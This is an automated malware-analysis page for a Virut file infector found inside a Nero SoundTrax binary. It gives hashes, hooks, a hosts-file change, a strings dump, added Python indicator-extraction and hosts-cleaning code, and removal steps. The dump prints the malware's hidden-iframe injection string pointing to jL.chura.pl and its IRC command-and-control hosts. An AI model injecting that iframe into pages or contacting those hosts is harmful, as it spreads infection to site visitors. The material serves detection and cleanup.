Virus.Win32.Virut_73f3fd7f3e

by malwarelabrobot on December 15th, 2014 in Malware Descriptions.

HEUR:Virus.Win32.Generic (Kaspersky), Win32.Virtob.Gen.12 (B) (Emsisoft), Win32.Virtob.Gen.12 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, VirusVirut.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Virus


This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: 73f3fd7f3eeb2b135074e0d7ecdc693d
SHA1: 1955bd018c6fbeff9cf09fa6502af8b14acfac30
SHA256: b1812a505078c13a4a52b640aadb5b14a10a0763d3637d33cb7c0388a4fac1c9
SSDeep: 49152:o34h4Hit9abab6uO7nMxXhittBQKDaPx:HaCt9wab6uMewQtx
Size: 1970264 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2006-07-19 20:57:24
Analyzed on: WindowsXP SP3 32-bit


Summary:

Virus: a program that replicates by inserting a possibly mutated copy of itself into other executables. The sample analysed here is a Nero SoundTrax binary (see VersionInfo below) carrying the Virut file infector; most of the strings in the dump section belong to the host program, and the Virut-specific indicators (IRC servers, hosts-file line, hidden iframe) are concentrated in the rwx memory region dumped at the end of that section.

Payload

No specific payload has been found.

Process activity

The Virus creates the following process(es):
No processes have been created.
The Virus injects its code into the following process(es):

%original file name%.exe:632

PID 632 is the sample's own process: the Virut code runs inside the infected host program instead of spawning a separate process, so there is no extra process name to look for.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

No files have been created.

Registry activity

The process %original file name%.exe:632 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 CF F5 5E CC 3F F3 99 F7 34 F2 A1 54 12 56 4F"

This value is rewritten by the Windows cryptographic provider whenever a process requests random bytes (for example through CryptGenRandom), so on its own it is a side effect of the sample running, not a persistence or configuration artifact.

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

The Virus modifies the "%System%\drivers\etc\hosts" file, which maps hostnames to IP addresses before DNS is consulted.
The modified file is 734 bytes in size. The following line is added to the hosts file:

127.0.0.1 jL.chura.pl

Mapping jL.chura.pl to loopback means the infected machine itself can never reach that host; the same hostname appears in the hidden-iframe string in the dump below.


Rootkit activity

The Virus installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtCreateProcessEx
NtCreateProcess
NtCreateFile

Hooking the file-open and process-creation entry points is consistent with a file infector that wants to see executables as they are opened or launched; a hook on NtQueryInformationProcess is a common way to interfere with debuggers and process inspection. Because these are user-mode patches to the infected process's copy of ntdll.dll, comparing the first bytes of each export in memory against the on-disk image exposes them.

Propagation

VersionInfo

Company Name: Nero AG
Product Name: Nero SoundTrax
Product Version: 1, 0, 0, 57
Legal Copyright: Copyright (c) 2003-2005 Nero AG and its licensors
Legal Trademarks: Nero SoundTrax
Original Filename: SoundTrax.exe
Internal Name: Nero SoundTrax
File Version: 1, 0, 0, 57
File Description: Nero SoundTrax
Comments:
Language: English (United States)

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             837382        839680    4.57129  3f16146e196b649565119cef26271a50
.rdata  843776           174752        176128    3.15883  9e59043f91d38c38a60b1cbb9edf0e1a
.data   1019904          107732        90112     3.92241  8f430fe818c75815e4dac0f783f2a04f
.rsrc   1130496          827392        827392    4.2641   fa86fa407ff76f7c115e734a88aafb02

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Virus connects to the servers at the following location(s):

No connections were observed during analysis. The IRC hostnames irc.zief.pl and proxim.ircgalaxy.pl and the NICK/JOIN command strings in the dump below indicate the IRC command-and-control the sample would attempt when it has network access.

Strings from Dumps

%original file name%.exe_632:

.text
`.rdata
.data
.rsrc
tcSSSh
SSSh(ZM
t!SSSShP
SSSSh@
.tTPV
FTPjK
FtPj;
F.PjRWj
u.WWj
u.VVj
u$SShe
@u.Wj
G.UPj
SSSh$sM
CLSID\{436F4AD7-C95B-4d2f-B0F8-8DC643F7A200}
CHotKeyCtrl
msctls_hotkey32
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
%*.*f
GDI32.DLL
{X-X-X-XX-XXXXXX}
MSWHEEL_ROLLMSG
File%d
windows
CNotSupportedException
CTL3D32.DLL
MSH_SCROLL_LINES_MSG
ddeexec
%s\ShellNew
%s\DefaultIcon
%s\shell\printto\%s
%s\shell\print\%s
%s\shell\open\%s
ole32.dll
__MSVCRT_HEAP_SELECT
user32.dll
portuguese-brazilian
ADVAPI32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegEnumKeyA
SHFOLDER.dll
WINMM.dll
VERSION.dll
GetWindowsDirectoryA
WinExec
GetCPInfo
KERNEL32.dll
GetKeyState
EnumChildWindows
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
GetAsyncKeyState
CreateDialogIndirectParamA
USER32.dll
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GDI32.dll
comdlg32.dll
WINSPOOL.DRV
ShellExecuteA
SHELL32.dll
COMCTL32.dll
oledlg.dll
OLEPRO32.DLL
OLEAUT32.dll
SHDeleteKeyA
SHLWAPI.dll
Nero.txt
\track%d.wav
Server%d
/%s%d%s
DefExportFormat
%.2f %s
PlaylistImport
NWE.CMainFrm.PostCreate
ShowCmd
LastWindowState
nero.exe
Software\Microsoft\Windows\CurrentVersion\App Path
%s|*%s||
NewTake%d.wav
%d:d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\NCoverEd.exe
nero.cdc
\NeroAPI.dll
NeroImportIsoTrack
NeroImportIsoTrackEx
NeroImportDataTrack
%d %s
%d%s %.2d%s
%d %.3d %.3d %.3d
%d %.3d %.3d
%d %.3d
%d%s %.2d%s:%.3d
%d - %s
%x-%x-%x-%x
ID:0x%lX Cmd: 0x%X
Hilfe-Symbol-Name: %s
Res-Symbol-Name: %s
%d.%d.%d.%d
.PAVCResourceException@@
..\..\NERO\hlp\Nero.hm
KERNEL32.DLL
shdocvw.dll
Portuguese(Brazil)
Portuguese (Brazil)
SUBLANG_PORTUGUESE_BRAZILIAN
Portuguese
SUBLANG_PORTUGUESE
LANG_PORTUGUESE
*.hlp
*.chm
eng.hlp
eng.chm
Requested:%d
Present:%d
UniTranslator dictionary file 1.0.0.1
UniTranslator dictionary file 1.0.0.0
NeASL.dll
\winhlp32.exe
There was not enough memory to complete the operation.
The operating system denied
The .EXE file is invalid
(non-Win32 .EXE or error in .EXE image).
The operating system is out
Serial6_%d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SetSecurityDescriptorDacl Error %u
InitializeSecurityDescriptor Error %u
LocalAlloc Error %u
SetEntriesInAcl Error %u
AllocateAndInitializeSid Error %u
Windows Media Player
NeroDigitalPro!UninstallKey
NeroMultiMounter!UninstallKey
NeroMediaHome!UninstallKey
SIPPSTAR-PBX!UninstallKey
NeroBackItUp!UninstallKey
NeroRecode!UninstallKey
NeroShowTime!UninstallKey
NeroNet!UninstallKey
NMIX!UninstallKey
NMPUninstallKey
InCD!UninstallKey
Nero - Burning Rom!UninstallKey
NeroVision!UninstallKey
SIPPS!UninstallKey
SpecialOffer.exe
mp3PRO.dll
NeroDigitalExt.dll
NeroBurnPlugin.dll
NeVCD.ax
NeNDMux.ax
NDParser.ax
NeroBurnRights.exe
NeAudioConv.ax
NeDVD.ax
Neroshx.dll
PackageCreator.exe
DiscAgent.exe
PhotoSnapViewer.exe
PhotoSnap.exe
DMAManager.exe
AdvrCntr.dll
SetupX.exe
Setup.exe
BurnSupportDisc.exe
NeroDigitalVideoEncoder.ax
NeroDigitalAudioEncoder.ax
NeNDAud.ax
Aac.dll
NeroMediaCon.dll
NeVCR.dll
NeVCR.ax
NeRecode.dll
NeACenc.dll
NeAudio.ax
NeNDVid.ax
NeMPG.ax
NeVideo.ax
ShortCut.dll
TestNeroLicense.exe
NeroStartSmart.exe
InfoTool.exe
DriveSpeed.exe
CDSpeed.exe
ImageDrive.exe
SoundTrax.exe
CentralAMSvc.exe
GatewaySvc.exe
RTPProxySvc.exe
wizardui.exe
configui.exe
sip_proxySvc.exe
phone.exe
BackItUp.exe
NeroNET.exe
NeroMediaPlayer.exe
CoverDes.exe
WaveEdit.exe
InCDL.exe
InCD.exe
nnservicectrl.exe
NMSTranscoder.exe
NeroMediaHome.exe
moviemk.exe
WINWORD.EXE
POWERPNT.EXE
OUTLOOK.EXE
EXCEL.EXE
wmplayer.exe
NeNDConv.exe
Nero.exe
Recode.exe
NeroVision.exe
ShowTime.exe
NeroMix.exe
NLDBV$Revision: 1.18.2.65 $
CLSID\{4EC0690F-EA6F-4573-845F-782AD19F35DB}\InprocServer32
LicenseKey
CLSID\{C46FF1FF-78EF-4939-8B00-46273B7B8EE1}\InprocServer32
Burlywood
#XXX
\VMPEG2Enc.dll
\DVDMPEG2Enc.dll
\..\Shared\AudioPlugins\aacmp32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\nero.exe
\aacmp32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\NeroMediaPlayer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Nero.exe
NeMP3Enc.dll
6, 6, 0, 13
HMPITM.exe
ddddd
NeRSDB.dll
GetASPI32SupportInfo
WNASPI32.DLL
SetupAPI.dll
.?AVCCmdTarget@@
.?AVCHotKeyCtrl@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCArchiveException@@
.PAVCObject@@
.PAVCSimpleException@@
.?AVCStatusCmdUI@@
.?AVCToolCmdUI@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCFileException@@
.PAVCOleDispatchException@@
.PAVCOleException@@
zcÁ
c:\%original file name%.exe
[[[^^^```}}}
&&~%%{$/
.SHtR7
4441444
444\4443444
G..cmQQ
444\444!
444]444!
O..WkHH
444]444"
.dd\WMJ
.MMM00,
.MM00.
.JJ0.
444_4448444
444`4447444
444_4443444
4443444
=..|444&
4448444
?@-cfH}}X
gM5hI4R<(Q3#TB-W>.aC2XA1
eB"uN.jK-|U:P,
U0]7 mL-pI.pM0K.
a?gA#^<%dG(pH-hA*U7
K6#aG/^G.cC-T7"8)
eC.zT:xiJ
oUxXBoE.waC
nj.lT/H4
rA.rF0
tqQg8%sZ<
YA%S5
slOwE.aF,fZ>
t]=Ê)
nB-uF.cO2D5#0=`
{\eF.cI1
uK1mF.WD.?/
ztU=\<%s]A
o9#kD.UE.
{pdK/sS;qX>iN5sV=oO6iL5kN7mM5[D,x[BhK0_C)eJ0dH.dI**
rP.mB
aP0~fHoS=mH.qV:lK4j\:
zE.jS5
dD.pD,~]?6
K9$mP%s[$aB1~pQ
gItS6tX7z_>rR7tY:yV:jL4fI.rM1k3
bG.hL3qT;sY@hM4iK5lT6mO6gJ2rT5jL2gL0[D&
_A'_B%uV9oT7iM/oR5mW7nV9gN-kM1r\;pN3d'
bK {eDoH.kL0}
zI)}K uL-zQ.vP/|V3
~eJcJ.pX;nP7pR9pY:iS8qY:pX9kT7pS:lU4mS7nP4iP5eN2hL3jR6mU8iO3gL3gL2lL4hN5kQ6hJ1I2
nbD3nI.xW<
~_8(!< ".!
jU7xL.lN6
{dM5xK.rV:
hjj3zx>dZ0aN.mN1nE*xD b2 k;
1d%U~<~VP
es}EmxB`b7[K3`J.nY0aN!gR.dF V9
NKS(UN.YN-\M*VB
List of audio files to import. Click an audio file to highlight it.
Select the default file format that should be used when exporting audio files from SoundTrax.
Enter the directory where the exported tracks should be saved.
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
ADVAPI32.DLL
\RUNDLL32.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
irc.zief.pl
proxim.ircgalaxy.pl
NICK kefqbevr
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
?.chuu
windowsupdate
drweb
1, 0, 0, 57
{E6674EE4-57B1-42F2-A953-43705B992AD5}
{8352EDFE-28C3-4012-90BC-43B0AF7B7E57}
Default export file format:
Audio files to import:
{A8DC3A14-CBFC-4BE8-995D-2FDB6C7AA9F2}
{3CEC18D8-3C79-4570-82E6-81D54AB300C3}
{A7F78220-7648-4826-837B-6001E2AD7824}
Export CD Tracks to Audio Files
Export CD Tracks to Audio Files...
&Export to Audio File...
About %s
Version: %s
Name: %s
Company: %s
http://www.microsoft.com/windows/ie
Nero SoundTrax Project Files (*.npf)
SoundTrax.Project
Duration of object: %sTNero SoundTrax could not find any audio file filter plug-ins. Please reinstall Nero..Wave Files (*.wav)|*.wav|All Files (*.*)|*.*||
%d minutes
Transport Bar
%d hours
Track %d!Could not measure tempo of clips.TNero SoundTrax could not find any audio file filter plug-ins. Please reinstall Nero.&%s (Volume label: %s, File system: %s);An error occurred while trying to open the Nero Wave Editor
Unable to create file %s.
Track %d
Ready%Select an object on which to get Help
Help
Assignable Effect Group %dJThe selected item is not an assignable effect group and cannot be removed.
FX G%d!The two clips have the same tempo
Exporting
, %d%% done4NeroAPI was not able to open the selected CD device.
CD Track %d!There is no CD-RW in the recorder
CD Index %d,The selected recorder does not support CD-RW
%dx (%d KB per second)?The inserted CD-RW is not empty. Do you wish to erase the disc?%An error occurred while importing %s.MUnable to open the file %s which is referenced by the Nero SoundTrax project.
Burn CD.Change property settings of the selected track
%d:%.1d:%.3d
Track %d of %d
(fixed speed)IPlease insert a CDR or just click OK if you are using the Image Recorder./Image Files (*.nrg)|*.nrg|All Files (*.*)|*.*||
Use a linear crossfade function%Use an exponential crossfade function$Use a logarithmic crossfade function#Use a sinusoidal crossfade function
Pan (in %)4An error occurred while trying to access the NeroAPI1No compatible recorders were found on this system*Playlist File (*.pls; *.m3u)|*.pls;*.m3u||
All Files (*.*)|*.*|&Volume Slider (range -40 dB to  12 dB)/Pan Slider (range -100% = left to 100% = right)(Track Level Meter (range -60 dB to 0 dB)
Vol: %d dB
Pan: %d %%
Step %d of %d:
Grid line at each 8th triplet9Opens the effect chain editor for the master effect chain.The file is not a Nero SoundTrax project file.
Effect Files (*.eff)
EffectBrowser.Document
%d BPM
Creating peak file, %d%% done.
Play Looped
VThis operation will remove the content of the current project. Do you want to proceed?
Version %d.%d.%d.%d
Insert Audio File(s)ZThis operation deletes the track and its entire content. Are you sure you want to proceed?
Title: %s, Artist: %s
There are too many CD tracks in the project. The Audio CD standard does not support more than 98 CD tracks. Some CD tracks were truncated
Select the maximum noise level in pauses between tracks and the minimum length of pauses and tracks. Click "Detect" to scan the recording with new settings.vSet the length of the pause between tracks or the length of the overlap if you want tracks crossfaded into each other.lAdjust the level of noise reduction to what you find optimal. You can hear the result by clicking "preview".
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
#Unable to load mail system support.
%The help file cannot be opened: %1!s! No Help topic is associated with this item.PThe license you are currently using does not allow you to start this application
This version of the application cannot be run in this language. Please visit our Web site at www.nero.com to purchase an unlimited serial number.
Visit our support pages for more information about manuals and help files.

%original file name%.exe_632_rwx_005C8000_00005000:

ADVAPI32.DLL
\RUNDLL32.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
irc.zief.pl
proxim.ircgalaxy.pl
NICK kefqbevr
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
?.chuu
KERNEL32.DLL
windowsupdate
drweb
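The rwx region above is where the Virut-specific indicators sit, separate from the Nero host program's own strings. The following is an added example, not code from the original page, of carving printable strings out of such a dump and sorting them into the indicator classes a responder acts on: IRC servers and commands, the hosts-file line, the hidden-iframe injection string and the URL inside it, loaded modules, and the firewall-exception template (the "%s:*:enabled:..." string has the shape of a value under the Windows Firewall AuthorizedApplications\List key). The DUMP bytes are a constructed stand-in for the region, built from the strings listed above with NUL separators and junk padding; KEYWORDS is an assumed watch-word list made from the two bare words in the dump. A second function checks HTML content for iframes styled display:none, the form the injection string carries; the page does not show that injection happening in this sandbox run.

```python
import re
from urllib.parse import urlparse

# Constructed stand-in for the 0x5000-byte rwx region at 0x005C8000 listed
# above: the recovered strings, NUL-separated and wrapped in junk bytes so the
# extractor has to carve them itself.  Not a real memory dump.
DUMP = b"\x8b\xff\x55\x00" + b"\x00".join([
    b"ADVAPI32.DLL", b"\\RUNDLL32.EXE", b"%s:*:enabled:@shell32.dll,-1",
    b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer",
    b"irc.zief.pl", b"proxim.ircgalaxy.pl", b"NICK kefqbevr",
    b"SFC.DLL", b"SFC_OS.DLL", b"USER32.DLL", b"SHLWAPI.DLL",
    b"WSOCK32.DLL", b"WININET.DLL", b"%.6x . . :%c%.8x%x %s", b"JOIN",
    b"127.0.0.1 jL.chura.pl",
    b'#<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>',
    b"?.chuu", b"KERNEL32.DLL", b"windowsupdate", b"drweb",
]) + b"\x00\xe8\x00\x00\x00\x00"

PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
HOSTNAME = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)
HOSTS_LINE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+(\S+)$")
URL = re.compile(r"https?://[^\s\"'<>]+")
IFRAME = re.compile(r'<iframe\b[^>]*\bsrc="([^"]+)"[^>]*>', re.I)
HIDDEN_IFRAME = re.compile(r'<iframe\b[^>]*\bstyle="[^"]*display\s*:\s*none[^"]*"[^>]*>', re.I)
IRC_CMD = re.compile(r"^(NICK|USER|JOIN|PRIVMSG)(?:\s+(\S+))?$")
MODULE_EXT = (".dll", ".exe", ".drv", ".ax", ".sys")
KEYWORDS = ("windowsupdate", "drweb")   # assumed watch words, taken from the dump


def carve_strings(blob):
    """Printable-ASCII runs of at least four bytes, in dump order."""
    return [m.group().decode("ascii") for m in PRINTABLE.finditer(blob)]


def extract_iocs(blob):
    """Sort carved strings into indicator classes; list-valued sets are sorted."""
    iocs = {"hostnames": set(), "irc": {}, "hosts_file": [], "urls": set(),
            "iframes": [], "modules": set(), "registry": [],
            "firewall_template": [], "keywords": []}
    for s in carve_strings(blob):
        low = s.lower()
        if low.endswith(MODULE_EXT):
            iocs["modules"].add(s.lstrip("\\"))
        elif low.startswith(("software\\", "system\\", "hklm\\", "hkcu\\")):
            iocs["registry"].append(s)
        elif ":*:enabled:" in low:          # AuthorizedApplications\List value shape
            iocs["firewall_template"].append(s)
        elif HOSTNAME.match(s):
            iocs["hostnames"].add(s)
        elif low in KEYWORDS:
            iocs["keywords"].append(s)
        m = IRC_CMD.match(s)
        if m:
            iocs["irc"][m.group(1)] = m.group(2)
        m = HOSTS_LINE.match(s)
        if m:
            iocs["hosts_file"].append((m.group(1), m.group(2)))
            iocs["hostnames"].add(m.group(2))
        for u in URL.findall(s):
            iocs["urls"].add(u)
            iocs["hostnames"].add(urlparse(u).netloc)   # netloc keeps the original case
        m = IFRAME.search(s)
        if m:
            iocs["iframes"].append(m.group(1))
    for k in ("hostnames", "urls", "modules"):
        iocs[k] = sorted(iocs[k])
    return iocs


def find_hidden_iframes(html):
    """src of every iframe styled display:none, the shape the dump string has."""
    return [m.group(1) for tag in HIDDEN_IFRAME.finditer(html)
            for m in [IFRAME.search(tag.group())] if m]


if __name__ == "__main__":
    for key, value in extract_iocs(DUMP).items():
        print(f"{key:18} {value}")
```

The hostname regex is deliberately narrow (letters, digits, hyphens, a dotted label structure) and is applied only after module and registry names have been classified, otherwise every DLL name with a three-letter extension would be reported as a host. On an infected web root, find_hidden_iframes run over .htm/.html/.php files gives the list of injected sources to block and clean.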


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan the system with an anti-rootkit tool (the sample patches ntdll.dll exports in user mode; see Rootkit activity above).
  2. Terminate malicious process(es) (How to End a Process With the Task Manager). This sample created no separate process; its code runs inside the infected host executable, so close that program if it is running.
  3. Delete the original Virus file. Because this is a file infector, other executables on the system may carry the same code, so a full scan with a product that disinfects Virut is needed rather than deleting this one file.
  4. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts) by removing the added line and leaving only:
    127.0.0.1 localhost
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
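Both the HOSTS file anomaly section above and step 4 of the manual removal come down to the same check: which hosts entries were added, and what the file should look like once they are gone. The following is an added example, not code from the page or from Ad-Aware, that audits a hosts file and produces the cleaned version. SAMPLE_HOSTS is a constructed file (the stock Windows XP header plus the one line the sandbox saw added); WATCHLIST is an assumed list of update/AV name fragments built from the two bare words in the dump above, standing in for the full hostnames a real deployment would watch.

```python
import ipaddress

# Constructed sample: the stock Windows XP hosts file plus the single line the
# sandbox saw added (127.0.0.1 jL.chura.pl).  Not a file taken from a machine.
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
127.0.0.1 jL.chura.pl
"""

# Names that legitimately map to loopback.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}

# Assumed watchlist: substrings of update/AV hostnames that malware commonly
# remaps.  The two entries are the bare words seen in the dump above; a real
# deployment would list the full hostnames it cares about.
WATCHLIST = ("windowsupdate", "drweb")


def iter_hosts(text):
    """Yield (line_index, ip, [names]) for every line that starts with an address."""
    for idx, raw in enumerate(text.splitlines()):
        body = raw.split("#", 1)[0].strip()
        if not body:
            continue
        fields = body.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # not an address; a real audit should report these lines too
        yield idx, ip, fields[1:]


def classify(ip, name):
    """Verdict for one (ip, name) pair, or None when the mapping looks benign."""
    lname = name.lower()
    sinkhole = ip.is_loopback or ip.is_unspecified
    if sinkhole and lname not in LOOPBACK_NAMES:
        return "sinkholed"          # traffic to this host never leaves the box
    if not sinkhole and any(w in lname for w in WATCHLIST):
        return "hijacked"           # watchlisted name pointed somewhere else
    return None


def suspicious_hosts_entries(text):
    """List (ip, name, verdict) for every entry that looks tampered with."""
    out = []
    for _, ip, names in iter_hosts(text):
        for name in names:
            verdict = classify(ip, name)
            if verdict:
                out.append((str(ip), name, verdict))
    return out


def clean_hosts(text):
    """The file with every flagged line dropped; comments and benign mappings
    (including '127.0.0.1 localhost') are kept byte for byte."""
    bad = {idx for idx, ip, names in iter_hosts(text)
           if any(classify(ip, n) for n in names)}
    kept = [line for i, line in enumerate(text.splitlines()) if i not in bad]
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for ip, name, verdict in suspicious_hosts_entries(SAMPLE_HOSTS):
        print(f"{verdict:10} {ip:15} {name}")
    print(clean_hosts(SAMPLE_HOSTS), end="")
```

Ad-blocking hosts lists also map names to 127.0.0.1 or 0.0.0.0, so on a machine that uses one the "sinkholed" verdicts need a whitelist before clean_hosts is applied; the "hijacked" verdict (a watched name pointed at a routable address) is the one that should never have a benign explanation.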